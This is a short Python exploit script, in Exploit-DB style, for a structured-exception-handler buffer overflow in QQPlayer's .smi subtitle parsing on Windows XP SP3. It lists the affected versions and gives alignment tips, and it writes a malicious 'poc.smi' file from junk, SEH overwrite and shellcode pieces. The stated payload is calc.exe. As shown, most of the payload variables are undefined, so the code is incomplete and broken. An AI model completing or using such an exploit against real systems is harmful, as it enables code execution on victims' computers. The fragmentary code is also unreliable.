#!/usr/bin/env python ################################################################# # # Title: QQPlayer smi File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400p1 # Vulnerable: QQPlayer<=2.3.696.400p1 # Exploit-DB Notes: A different SEH addr might be necessary for XP SP3 ENG. # Make sure EAX aligns to the shellcode before decoding. # Payload=calc.exe # ################################################################# # Code : head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.smi","w") fobj.write(payload) fobj.close()